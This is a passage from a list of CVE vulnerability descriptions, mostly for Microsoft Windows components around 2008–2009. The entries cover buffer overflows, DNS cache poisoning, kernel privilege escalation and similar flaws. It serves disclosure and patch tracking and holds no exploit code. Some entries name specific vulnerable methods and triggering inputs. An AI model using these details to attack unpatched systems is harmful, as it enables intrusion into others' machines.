a .. (dot dot) in a pathname. NOTE: this can be leveraged for code execution by writing to a Startup folder. [CVE-2009-0243] Microsoft Windows does not properly enforce the Autorun and NoDriveTypeAutoRun registry values, which allows physically proximate attackers to execute arbitrary code by (1) inserting CD-ROM media, (2) inserting DVD media, (3) connecting a USB device, and (4) connecting a Firewire device [CVE-2009-0239] Cross-site scripting (XSS) vulnerability in Windows Search 4.0 for Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 allows user-assisted remote attackers to inject arbitrary web script or HTML via a crafted file that appears in a preview in a search result, aka "Script Execution in Windows Search Vulnerability." [CVE-2009-0235] Stack-based buffer overflow in the Word 97 text converter in WordPad in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP1 and SP2 allows remote attackers to execute arbitrary code via a crafted Word 97 file that triggers memory corruption, related to use of inconsistent integer data sizes for an unspecified length field, aka "WordPad Word 97 Text Converter Stack Overflow Vulnerability." [CVE-2009-0234] The DNS Resolver Cache Service (aka DNSCache) in Windows DNS Server in Microsoft Windows 2000 SP4, Server 2003 SP1 and SP2, and Server 2008 does not properly cache crafted DNS responses, which makes it easier for remote attackers to predict transaction IDs and poison caches by sending many crafted DNS queries that trigger "unnecessary lookups," aka "DNS Server Response Validation Vulnerability." [CVE-2009-0233] The DNS Resolver Cache Service (aka DNSCache) in Windows DNS Server in Microsoft Windows 2000 SP4, Server 2003 SP1 and SP2, and Server 2008, when dynamic updates are enabled, does not reuse cached DNS responses in all applicable situations, which makes it easier for remote attackers to predict transaction IDs and poison caches by simultaneously sending crafted DNS queries and responses, aka "DNS Server Query Validation Vulnerability." [CVE-2009-0232] Integer overflow in the Embedded OpenType (EOT) Font Engine in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allows remote attackers to execute arbitrary code via a crafted name table, aka "Embedded OpenType Font Integer Overflow Vulnerability." [CVE-2009-0231] The Embedded OpenType (EOT) Font Engine (T2EMBED.DLL) in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allows remote attackers to execute arbitrary code via a crafted name table in a data record that triggers an integer truncation and a heap-based buffer overflow, aka "Embedded OpenType Font Heap Overflow Vulnerability." [CVE-2009-0229] The Windows Printing Service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 SP2 allows local users to read arbitrary files via a crafted separator page, aka "Print Spooler Read File Vulnerability." [CVE-2009-0202] Array index error in FL21WIN.DLL in the PowerPoint Freelance Windows 2.1 Translator in Microsoft PowerPoint 2000 and 2002 allows remote attackers to execute arbitrary code via a Freelance file with unspecified "layout information" that triggers a heap-based buffer overflow. [CVE-2009-0119] Buffer overflow in Microsoft Windows XP SP3 allows remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via a crafted .chm file. [CVE-2009-0094] The WINS server in Microsoft Windows 2000 SP4 and Server 2003 SP1 and SP2 does not restrict registration of the (1) "wpad" and (2) "isatap" NetBIOS names, which allows remote authenticated users to hijack the Web Proxy Auto-Discovery (WPAD) and Intra-Site Automatic Tunnel Addressing Protocol (ISATAP) features, and conduct man-in-the-middle attacks by spoofing a proxy server or ISATAP route, by registering one of these names in the WINS database, aka "WPAD WINS Server Registration Vulnerability," a related issue to CVE-2007-1692. [CVE-2009-0093] Windows DNS Server in Microsoft Windows 2000 SP4, Server 2003 SP1 and SP2, and Server 2008, when dynamic updates are enabled, does not restrict registration of the "wpad" hostname, which allows remote authenticated users to hijack the Web Proxy Auto-Discovery (WPAD) feature, and conduct man-in-the-middle attacks by spoofing a proxy server, via a Dynamic Update request for this hostname, aka "DNS Server Vulnerability in WPAD Registration Vulnerability," a related issue to CVE-2007-1692. [CVE-2009-0089] Windows HTTP Services (aka WinHTTP) in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, and Vista Gold allows remote web servers to impersonate arbitrary https web sites by using DNS spoofing to "forward a connection" to a different https web site that has a valid certificate matching its own domain name, but not a certificate matching the domain name of the host requested by the user, aka "Windows HTTP Services Certificate Name Mismatch Vulnerability." [CVE-2009-0087] Unspecified vulnerability in the Word 6 text converter in WordPad in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP1 and SP2 [CVE-2009-0086] Integer underflow in Windows HTTP Services (aka WinHTTP) in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows remote HTTP servers to execute arbitrary code via crafted parameter values in a response, related to error handling, aka "Windows HTTP Services Integer Underflow Vulnerability." [CVE-2009-0085] The Secure Channel (aka SChannel) authentication component in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008, when certificate authentication is used, does not properly validate the client's key exchange data in Transport Layer Security (TLS) handshake messages, which allows remote attackers to spoof authentication by crafting a TLS packet based on knowledge of the certificate but not the private key, aka "SChannel Spoofing Vulnerability." [CVE-2009-0083] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP1 does not properly handle invalid pointers, which allows local users to gain privileges via an application that triggers use of a crafted pointer, aka "Windows Kernel Invalid Pointer Vulnerability." [CVE-2009-0082] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 does not properly validate handles, which allows local users to gain privileges via a crafted application that triggers unspecified "actions," aka "Windows Kernel Handle Validation Vulnerability." [CVE-2009-0081] The graphics device interface (GDI) implementation in the kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 does not properly validate input received from user mode, which allows remote attackers to execute arbitrary code via a crafted (1) Windows Metafile (aka WMF) or (2) Enhanced Metafile (aka EMF) image file, aka "Windows Kernel Input Validation Vulnerability." [CVE-2009-0078] The Windows Management Instrumentation (WMI) provider in Microsoft Windows XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 does not properly implement isolation among a set of distinct processes that (1) all run under the NetworkService account or (2) all run under the LocalService account, which allows local users to gain privileges by accessing the resources of one of the processes, aka "Windows WMI Service Isolation Vulnerability." [CVE-2008-6819] win32k.sys in Microsoft Windows Server 2003 and Vista allows local users to cause a denial of service (system crash) via vectors related to CreateWindow, TranslateMessage, and DispatchMessage, possibly a race condition between threads, a different vulnerability than CVE-2008-1084. NOTE: some of these details are obtained from third party information. [CVE-2008-6219] nsrexecd.exe in multiple EMC Networker products including EMC NetWorker Server, Storage Node, and Client 7.3.x and 7.4, 7.4.1, 7.4.2, Client and Storage Node for Open VMS 7.3.2 ECO6 and earlier, Module for Microsoft Exchange 5.1 and earlier, Module for Microsoft Applications 2.0 and earlier, Module for Meditech 2.0 and earlier, and PowerSnap 2.4 SP1 and earlier does not properly control the allocation of memory, which allows remote attackers to cause a denial of service (memory exhaustion) via multiple crafted RPC requests. [CVE-2008-6194] Memory leak in the DNS server in Microsoft Windows allows remote attackers to cause a denial of service (memory consumption) via DNS packets. NOTE: this issue reportedly exists because of an incorrect fix for CVE-2007-3898. [CVE-2008-5828] Microsoft Windows Live Messenger Client 8.5.1 and earlier, when MSN Protocol Version 15 (MSNP15) is used over a NAT session, allows remote attackers to discover intranet IP addresses and port numbers by reading the (1) IPv4InternalAddrsAndPorts, (2) IPv4Internal-Addrs, and (3) IPv4Internal-Port header fields. [CVE-2008-5823] An ActiveX control in prtstb06.dll in Microsoft Money 2006, when used with WScript in Windows Script Host (WSH) on Windows Vista, allows remote attackers to cause a denial of service (access violation and application crash) via a zero value for the Startup property. [CVE-2008-5750] Argument injection vulnerability in Microsoft Internet Explorer 8 beta 2 on Windows XP SP3 allows remote attackers to execute arbitrary commands via the --renderer-path option in a chromehtml: URI. [CVE-2008-5745] Integer overflow in quartz.dll in the DirectShow framework in Microsoft Windows Media Player (WMP) 9, 10, and 11, including 11.0.5721.5260, allows remote attackers to cause a denial of service (application crash) via a crafted (1) WAV, (2) SND, or (3) MID file. NOTE: this has been incorrectly reported as a code-execution vulnerability. NOTE: it is not clear whether this issue is related to CVE-2008-4927. [CVE-2008-5415] The LDBserver service in the server in CA ARCserve Backup 11.1 through 12.0 on Windows allows remote attackers to execute arbitrary code via a handle_t argument to an RPC endpoint in which the argument refers to an incompatible procedure. [CVE-2008-5232] Buffer overflow in the CallHTMLHelp method in the Microsoft Windows Media Services ActiveX control in nskey.dll 4.1.00.3917 in Windows Media Services on Microsoft Windows NT and 2000, and Avaya Media and Message Application servers, allows remote attackers to execute arbitrary code via a long argument. NOTE: the provenance of this information is unknown [CVE-2008-5229] Stack-based buffer overflow in Microsoft Device IO Control in iphlpapi.dll in Microsoft Windows Vista Gold and SP1 allows local users in the Network Configuration Operator group to gain privileges or cause a denial of service (system crash) via a large invalid PrefixLength to the CreateIpForwardEntry2 method, as demonstrated by a "route add" command. NOTE: this issue might not cross privilege boundaries. [CVE-2008-5179] Unspecified vulnerability in Microsoft Office Communications Server (OCS), Office Communicator, and Windows Live Messenger allows remote attackers to cause a denial of service (crash) via a crafted Real-time Transport Control Protocol (RTCP) receiver report packet. [CVE-2008-5112] The LDAP server in Active Directory in Microsoft Windows 2000 SP4 and Server 2003 SP1 and SP2 responds differently to a failed bind attempt depending on whether the user account exists and is permitted to login, which allows remote attackers to enumerate valid usernames via a series of LDAP bind requests, as demonstrated by ldapuserenum. [CVE-2008-5044] Race condition in Microsoft Windows Server 2003 and Vista allows local users to cause a denial of service (crash or hang) via a multi-threaded application that makes many calls to UnhookWindowsHookEx while certain other desktop activity is occurring. [CVE-2008-4927] Microsoft Windows Media Player (WMP) 9.0 through 11 allows user-assisted attackers to cause a denial of service (application crash) via a malformed (1) MIDI or (2) DAT file, related to "MThd Header Parsing." NOTE: the provenance of this information is unknown [CVE-2008-4841] The WordPad Text Converter for Word 97 files in Microsoft Windows 2000 SP4, XP SP2, and Server 2003 SP1 and SP2 allows remote attackers to execute arbitrary code via a crafted (1) .doc, (2) .wri, or (3) .rtf Word 97 file that triggers memory corruption, as exploited in the wild in December 2008. NOTE: As of 20081210, it is unclear whether this vulnerability is related to a WordPad issue disclosed on 20080925 with a 2008-crash.doc.rar example, but there are insufficient details to be sure. [CVE-2008-4835] SMB in the Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows remote attackers to execute arbitrary code via malformed values of unspecified "fields inside the SMB packets" in an NT Trans2 request, related to "insufficiently validating the buffer size," aka "SMB Validation Remote Code Execution Vulnerability." [CVE-2008-4834] Buffer overflow in SMB in the Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP1 and SP2 allows remote attackers to execute arbitrary code via malformed values of unspecified "fields inside the SMB packets" in an NT Trans request, aka "SMB Buffer Overflow Remote Code Execution Vulnerability." [CVE-2008-4609] The TCP implementation in (1) Linux, (2) platforms based on BSD Unix, (3) Microsoft Windows, (4) Cisco products, and probably other operating systems allows remote attackers to cause a denial of service (connection queue exhaustion) via multiple vectors that manipulate information in the TCP state table, as demonstrated by sockstress. [CVE-2008-4510] Microsoft Windows Vista Home and Ultimate Edition SP1 and earlier allows local users to cause a denial of service (page fault and system crash) via multiple attempts to access a virtual address in a PAGE_NOACCESS memory page. [CVE-2008-4327] gdiplus.dll in GDI+ in Microsoft Windows XP SP3 does not properly handle crafted .ico files, which allows remote attackers to cause a denial of service (divide-by-zero error and application crash) via a certain crash.ico file on a web site, and allows user-assisted attackers to cause a denial of service (divide-by-zero error and persistent application crash) via this crash.ico file on the desktop, a different vulnerability than CVE-2007-2237. [CVE-2008-4323] Windows Explorer in Microsoft Windows XP SP3 allows user-assisted attackers to cause a denial of service (application crash) via a crafted .ZIP file. [CVE-2008-4295] Microsoft Windows Mobile 6.0 on HTC Wiza 200 and HTC MDA 8125 devices does not properly handle the first attempt to establish a Bluetooth connection to a peer with a long name, which allows remote attackers to cause a denial of service (device reboot) by configuring a Bluetooth device with a long hci name and (1) connecting directly to the Windows Mobile system or (2) waiting for the Windows Mobile system to scan for nearby devices. [CVE-2008-4269] The search-ms protocol handler in Windows Explorer in Microsoft Windows Vista Gold and SP1 and Server 2008 uses untrusted parameter data obtained from incorrect parsing, which allows remote attackers to execute arbitrary code via a crafted HTML document, aka "Windows Search Parsing Vulnerability." [CVE-2008-4268] The Windows Search component in Microsoft Windows Vista Gold and SP1 and Server 2008 does not properly free memory during a save operation for a Windows Search file, which allows remote attackers to execute arbitrary code via a crafted saved-search file, aka "Windows Saved Search Vulnerability." [CVE-2008-4261] Stack-based buffer overflow in Microsoft Internet Explorer 5.01 SP4, 6 SP1 on Windows 2000, and 6 on Windows XP and Server 2003 does not properly handle extraneous data associated with an object embedded in a web page, which allows remote attackers to execute arbitrary code via crafted HTML tags that trigger memory corruption, aka "HTML Rendering Memory Corruption Vulnerability." [CVE-2008-4255] Heap-based buffer overflow in mscomct2.ocx (aka Windows Common ActiveX control or Microsoft Animation ActiveX control) in Microsoft Visual Basic 6.0, Visual Studio .NET 2002 SP1 and 2003 SP1, Visual FoxPro 8.0 SP1 and 9.0 SP1 and SP2, and Office Project 2003 SP3 and 2007 Gold and SP1 allows remote attackers to execute arbitrary code via an AVI file with a crafted stream length, which triggers an "allocation error" and memory corruption, aka "Windows Common AVI Parsing Overflow Vulnerability." [CVE-2008-4127] Mshtml.dll in Microsoft Internet Explorer 7 Gold 7.0.5730 and 8 Beta 8.0.6001 on Windows XP SP2 allows remote attackers to cause a denial of service (failure of subsequent image rendering) via a crafted PNG file, related to an infinite loop in the CDwnTaskExec::ThreadExec function. [CVE-2008-4071] A certain ActiveX control in Adobe Acrobat 9, when used with Microsoft Windows Vista and Internet Explorer 7, allows remote attackers to cause a denial of service (browser crash) via an src property value with an invalid acroie:// URL. [CVE-2008-4038] Buffer underflow in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows remote attackers to execute arbitrary code via a Server Message Block (SMB) request that contains a filename with a crafted length, aka "SMB Buffer Underflow Vulnerability." [CVE-2008-4037] Microsoft Windows 2000 Gold through SP4, XP Gold through SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows remote SMB servers to execute arbitrary code on a client machine by replaying the NTLM credentials of a client user, as demonstrated by backrush, aka "SMB Credential Reflection Vulnerability." NOTE: some reliable sources report that this vulnerability exists because of an insufficient fix for CVE-2000-0834. [CVE-2008-4036] Integer overflow in Memory Manager in Microsoft Windows XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows local users to gain privileges via a crafted application that triggers an erroneous decrement of a variable, related to validation of parameters for Virtual Address Descriptors (VADs) and a "memory allocation mapping error," aka "Virtual Address Descriptor Elevation of Privilege Vulnerability." [CVE-2008-4023] Active Directory in Microsoft Windows 2000 SP4 does not properly allocate memory for (1) LDAP and (2) LDAPS requests, which allows remote attackers to execute arbitrary code via a crafted request, aka "Active Directory Overflow Vulnerability." [CVE-2008-3957] The Microsoft Windows Image Acquisition Logger ActiveX control allows remote attackers to force the download of arbitrary files onto a client system via a URL in the first argument to the Open method, in conjunction with a full destination pathname in the first argument to the Save method. NOTE: the provenance of this information is unknown [CVE-2008-3893] Microsoft Bitlocker in Windows Vista before SP1 stores pre-boot authentication passwords in the BIOS Keyboard buffer and does not clear this buffer during boot, which allows local users to obtain sensitive information by reading the physical memory locations associated with this buffer. [CVE-2008-3815] Unspecified vulnerability in Cisco Adaptive Security Appliances (ASA) 5500 Series and PIX Security Appliances 7.0 before 7.0(8)3, 7.1 before 7.1(2)78, 7.2 before 7.2(4)16, 8.0 before 8.0(4)6, and 8.1 before 8.1(1)13, when configured as a VPN using Microsoft Windows NT Domain authentication, allows remote attackers to bypass VPN authentication via unknown vectors. [CVE-2008-3648] nslookup.exe in Microsoft Windows XP SP2 allows user-assisted remote attackers to execute arbitrary code, as demonstrated by an attempted DNS zone transfer, and as exploited in the wild in August 2008. [CVE-2008-3636] Integer overflow in the IopfCompleteRequest API in the kernel in Microsoft Windows 2000, XP, Server 2003, and Vista allows context-dependent attackers to gain privileges. NOTE: this issue was originally reported for GEARAspiWDM.sys 2.0.7.5 in Gear Software CD DVD Filter driver before 4.001.7, as used in other products including Apple iTunes and multiple Symantec and Norton products, which allows local users to gain privileges via repeated IoAttachDevice IOCTL calls to \\.\GEARAspiWDMDevice in this GEARAspiWDM.sys. However, the root cause is the integer overflow in the API call itself. [CVE-2008-3466] Microsoft Host Integration Server (HIS) 2000, 2004, and 2006 does not limit RPC access to administrative functions, which allows remote attackers to bypass authentication and execute arbitrary programs via a crafted SNA RPC message using opcode 1 or 6 to call the CreateProcess function, aka "HIS Command Execution Vulnerability." [CVE-2008-3465] Heap-based buffer overflow in an API in GDI in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows context-dependent attackers to cause a denial of service or execute arbitrary code via a WMF file with a malformed file-size parameter, which would not be properly handled by a third-party application that uses this API for a copy operation, aka "GDI Heap Overflow Vulnerability." [CVE-2008-3464] afd.sys in the Ancillary Function Driver (AFD) component in Microsoft Windows XP SP2 and SP3 and Windows Server 2003 SP1 and SP2 does not properly validate input sent from user mode to the kernel, which allows local users to gain privileges via a crafted application, as demonstrated using crafted pointers and lengths that bypass intended ProbeForRead and ProbeForWrite restrictions, aka "AFD Kernel Overwrite Vulnerability." [CVE-2008-3068] Microsoft Crypto API 5.131.2600.2180 through 6.0, as used in Outlook, Windows Live Mail, and Office 2007, performs Certificate Revocation List (CRL) checks by using an arbitrary URL from a certificate embedded in a (1) S/MIME e-mail message or (2) signed document, which allows remote attackers to obtain reading times and IP addresses of recipients, and port-scan results, via a crafted certificate with an Authority Information Access (AIA) extension. [CVE-2008-3014] Buffer overflow in gdiplus.dll in GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, Server 2008, Office XP SP3, Office 2003 SP2 and SP3, 2007 Microsoft Office System Gold and SP1, Visio 2002 SP2, PowerPoint Viewer 2003, Works 8, Digital Image Suite 2006, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2, Report Viewer 2005 SP1 and 2008, and Forefront Client Security 1.0 allows remote attackers to execute arbitrary code via a malformed WMF image file that triggers improper memory allocation, aka "GDI+ WMF Buffer Overrun Vulnerability." [CVE-2008-3013] gdiplus.dll in GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, Server 2008, Office XP SP3, Office 2003 SP2 and SP3, 2007 Microsoft Office System Gold and SP1, Visio 2002 SP2, PowerPoint Viewer 2003, Works 8, Digital Image Suite 2006, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2, Report Viewer 2005 SP1 and 2008, and Forefront Client Security 1.0 allows remote attackers to execute arbitrary code via a malformed GIF image file containing many extension markers for graphic control extensions and subsequent unknown labels, aka "GDI+ GIF Parsing Vulnerability." [CVE-2008-3012] gdiplus.dll in GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, Server 2008, Office XP SP3, Office 2003 SP2 and SP3, 2007 Microsoft Office System Gold and SP1, Visio 2002 SP2, PowerPoint Viewer 2003, Works 8, Digital Image Suite 2006, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2, Report Viewer 2005 SP1 and 2008, and Forefront Client Security 1.0 does not properly perform memory allocation, which allows remote attackers to execute arbitrary code via a malformed EMF image file, aka "GDI+ EMF Memory Corruption Vulnerability." [CVE-2008-3010] Microsoft Windows Media Player 6.4, Windows Media Format Runtime 7.1 through 11, and Windows Media Services 4.1 and 9 incorrectly associate ISATAP addresses with the Local Intranet zone, which allows remote servers to capture NTLM credentials, and execute arbitrary code through credential-reflection attacks, by sending an authentication request, aka "ISATAP Vulnerability." [CVE-2008-3009] Microsoft Windows Media Player 6.4, Windows Media Format Runtime 7.1 through 11, and Windows Media Services 4.1, 9, and 2008 do not properly use the Service Principal Name (SPN) identifier when validating replies to authentication requests, which allows remote servers to execute arbitrary code via vectors that employ NTLM credential reflection, aka "SPN Vulnerability." [CVE-2008-3008] Stack-based buffer overflow in the WMEncProfileManager ActiveX control in wmex.dll in Microsoft Windows Media Encoder 9 Series allows remote attackers to execute arbitrary code via a long first argument to the GetDetailsString method, aka "Windows Media Encoder Buffer Overrun Vulnerability." [CVE-2008-2547] Stack-based buffer overflow in msiexec.exe 3.1.4000.1823 and 4.5.6001.22159 in Microsoft Windows Installer allows context-dependent attackers to execute arbitrary code via a long GUID value for the /x (aka /uninstall) option. NOTE: this issue might cross privilege boundaries if msiexec.exe is reachable via components such as ActiveX controls, and might additionally require a separate vulnerability in the control. [CVE-2008-2540] Apple Safari on Mac OS X, and before 3.1.2 on Windows, does not prompt the user before downloading an object that has an unrecognized content type, which allows remote attackers to place malware into the (1) Desktop directory on Windows or (2) Downloads directory on Mac OS X, and subsequently allows remote attackers to execute arbitrary code on Windows by leveraging an untrusted search path vulnerability in (a) Internet Explorer 7 on Windows XP or (b) the SearchPath function in Windows XP, Vista, and Server 2003 and 2008, aka a "Carpet Bomb" and a "Blended Threat Elevation of Privilege Vulnerability," a different issue than CVE-2008-1032. NOTE: Apple considers this a vulnerability only because the Microsoft products can load application libraries from the desktop and, as of 20080619, has not covered the issue in an advisory for Mac OS X. [CVE-2008-2253] Unspecified vulnerability in Microsoft Windows Media Player 11 allows remote attackers to execute arbitrary code via a crafted audio-only file that is streamed from a Server-Side Playlist (SSPL) on Windows Media Server, aka "Windows Media Player Sampling Rate Vulnerability." [CVE-2008-2252] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 does not properly validate parameters sent from user mode to the kernel, which allows local users to gain privileges via a crafted application, aka "Windows Kernel Memory Corruption Vulnerability." [CVE-2008-2251] Double free vulnerability in the kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows local users to gain privileges via a crafted application that makes system calls within multiple threads, aka "Windows Kernel Unhandled Exception Vulnerability." NOTE: according to Microsoft, this is not a duplicate of CVE-2008-4510. [CVE-2008-2250] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 does not properly validate window properties sent from a parent window to a child window during creation of a new window, which allows local users to gain privileges via a crafted application, aka "Windows Kernel Window Creation Vulnerability." [CVE-2008-2249] Integer overflow in GDI in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows remote attackers to execute arbitrary code via a malformed header in a crafted WMF file, which triggers a buffer overflow, aka "GDI Integer Overflow Vulnerability." [CVE-2008-2246] Microsoft Windows Vista through SP1 and Server 2008 do not properly import the default IPsec policy from a Windows Server 2003 domain to a Windows Server 2008 domain, which prevents IPsec rules from being enforced and allows remote attackers to bypass intended access restrictions. [CVE-2008-2245] Heap-based buffer overflow in the InternalOpenColorProfile function in mscms.dll in Microsoft Windows Image Color Management System (MSCMS) in the Image Color Management (ICM) component on Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP1 and SP2 allows remote attackers to execute arbitrary code via a crafted image file. [CVE-2008-2160] Multiple unspecified vulnerabilities in the JPEG (GDI+) and GIF image processing in Microsoft Windows CE 5.0 allow remote attackers to execute arbitrary code via crafted (1) JPEG and (2) GIF images. [CVE-2008-1888] Cross-site scripting (XSS) vulnerability in Microsoft Windows SharePoint Services 2.0 allows remote attackers to inject arbitrary web script or HTML via the Picture Source (aka picture object source) field in the Rich Text Editor. [CVE-2008-1457] The Event System in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 does not properly validate per-user subscriptions, which allows remote authenticated users to execute arbitrary code via a crafted event subscription request. [CVE-2008-1456] Array index vulnerability in the Event System in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows remote authenticated users to execute arbitrary code via a crafted event subscription request that is used to access an array of function pointers. [CVE-2008-1454] Unspecified vulnerability in Microsoft DNS in Windows 2000 SP4, Server 2003 SP1 and SP2, and Server 2008 allows remote attackers to conduct cache poisoning attacks via unknown vectors related to accepting "records from a response that is outside the remote server's authority," aka "DNS Cache Poisoning Vulnerability," a different vulnerability than CVE-2008-1447. [CVE-2008-1453] The Bluetooth stack in Microsoft Windows XP SP2 and SP3, and Vista Gold and SP1, allows physically proximate attackers to execute arbitrary code via a large series of Service Discovery Protocol (SDP) packets. [CVE-2008-1451] The WINS service on Microsoft Windows 2000 SP4, and Server 2003 SP1 and SP2, does not properly validate data structures in WINS network packets, which allows local users to gain privileges via a crafted packet, aka "Memory Overwrite Vulnerability." [CVE-2008-1448] The MHTML protocol handler in a component of Microsoft Outlook Express 5.5 SP2 and 6 through SP1, and Windows Mail, does not assign the correct Internet Explorer Security Zone to UNC share pathnames, which allows remote attackers to bypass intended access restrictions and read arbitrary files via an mhtml: URI in conjunction with a redirection, aka "URL Parsing Cross-Domain Information Disclosure Vulnerability." [CVE-2008-1446] Integer overflow in the Internet Printing Protocol (IPP) ISAPI extension in Microsoft Internet Information Services (IIS) 5.0 through 7.0 on Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, and Server 2008 allows remote authenticated users to execute arbitrary code via an HTTP POST request that triggers an outbound IPP connection from a web server to a machine operated by the attacker, aka "Integer Overflow in IPP Service Vulnerability." [CVE-2008-1445] Active Directory on Microsoft Windows 2000 Server SP4, XP Professional SP2 and SP3, Server 2003 SP1 and SP2, and Server 2008 allows remote authenticated users to cause a denial of service (system hang or reboot) via a crafted LDAP request. [CVE-2008-1444] Stack-based buffer overflow in Microsoft DirectX 7.0 and 8.1 on Windows 2000 SP4 allows remote attackers to execute arbitrary code via a Synchronized Accessible Media Interchange (SAMI) file with crafted parameters for a Class Name variable, aka the "SAMI Format Parsing Vulnerability." [CVE-2008-1441] Microsoft Windows XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows remote attackers to cause a denial of service (system hang) via a series of Pragmatic General Multicast (PGM) packets with invalid fragment options, aka the "PGM Malformed Fragment Vulnerability." [CVE-2008-1440] Microsoft Windows XP SP2 and SP3, and Server 2003 SP1 and SP2, does not properly validate the option length field in Pragmatic General Multicast (PGM) packets, which allows remote attackers to cause a denial of service (infinite loop and system hang) via a crafted PGM packet, aka the "PGM Invalid Length Vulnerability." [CVE-2008-1436] Microsoft Windows XP Professional SP2, Vista, and Server 2003 and 2008 does not properly assign activities to the (1) NetworkService and (2) LocalService accounts, which might allow context-dependent attackers to gain privileges by using one service process to capture a resource from a second service process that has a LocalSystem privilege-escalation ability, related to improper management of the SeImpersonatePrivilege user right, as originally reported for Internet Information Services (IIS), aka Token Kidnapping. [CVE-2008-1435] Windows Explorer in Microsoft Windows Vista up to SP1, and Server 2008, allows user-assisted remote attackers to execute arbitrary code via crafted saved-search (.search-ms) files that are not properly handled when saving, aka "Windows Saved Search Vulnerability." [CVE-2008-1087] Stack-based buffer overflow in GDI in Microsoft Windows 2000 SP4, XP SP2, Server 2003 SP1 and SP2, Vista, and Server 2008 allows remote attackers to execute arbitrary code via an EMF image file with crafted filename parameters, aka "GDI Stack Overflow Vulnerability." [CVE-2008-1086] The HxTocCtrl ActiveX control (hxvz.dll), as used in Microsoft Internet Explorer 5.01 SP4 and 6 SP1, in Windows XP SP2, Server 2003 SP1 and SP2, Vista SP1, and Server 2008, allows remote attackers to execute arbitrary code via malformed arguments, which triggers memory corruption. [CVE-2008-1084] Unspecified vulnerability in the kernel in Microsoft Windows 2000 SP4, XP SP2, Server 2003 SP1 and SP2, through Vista SP1, and Server 2008 allows local users to execute arbitrary code via unknown vectors related to improper input validation. NOTE: it was later reported that one affected function is NtUserFnOUTSTRING in win32k.sys. [CVE-2008-1083] Heap-based buffer overflow in the CreateDIBPatternBrushPt function in GDI in Microsoft Windows 2000 SP4, XP SP2, Server 2003 SP1 and SP2, Vista, and Server 2008 allows remote attackers to execute arbitrary code via an EMF or WMF image file with a malformed header that triggers an integer overflow, aka "GDI Heap Overflow Vulnerability." [CVE-2008-0951] Microsoft Windows Vista does not properly enforce the NoDriveTypeAutoRun registry value, which allows user-assisted remote attackers, and possibly physically proximate attackers, to execute arbitrary code by inserting a (1) CD-ROM device or (2) U3-enabled USB device containing a filesystem with an Autorun.inf file, and possibly other vectors related to (a) AutoRun and (b) AutoPlay actions. [CVE-2008-0768] Multiple stack-based and heap-based buffer overflows in the Windows RPC components for IBM Informix Storage Manager (ISM), as used in Informix Dynamic Server (IDS) 10.00.xC8 and earlier and 11.10.xC2 and earlier, allow attackers to execute arbitrary code via crafted XDR requests. [CVE-2008-0639] Stack-based buffer overflow in the EnumPrinters function in the Spooler service (nwspool.dll) in Novell Client 4.91 SP2, SP3, and SP4 for Windows allows remote attackers to execute arbitrary code via a crafted RPC request, aka Novell bug 353138, a different vulnerability than CVE-2006-5854. NOTE: this issue exists because of an incomplete fix for CVE-2007-6701. [CVE-2008-0322] The I2O Utility Filter driver (i2omgmt.sys) 5.1.2600.2180 for Microsoft Windows XP sets Everyone/Write permissions for the "\\.\I2OExc" device interface, which allows local users to gain privileges. NOTE: this issue can be leveraged to overwrite arbitrary memory and execute code via an IOCTL call with a crafted DeviceObject pointer. 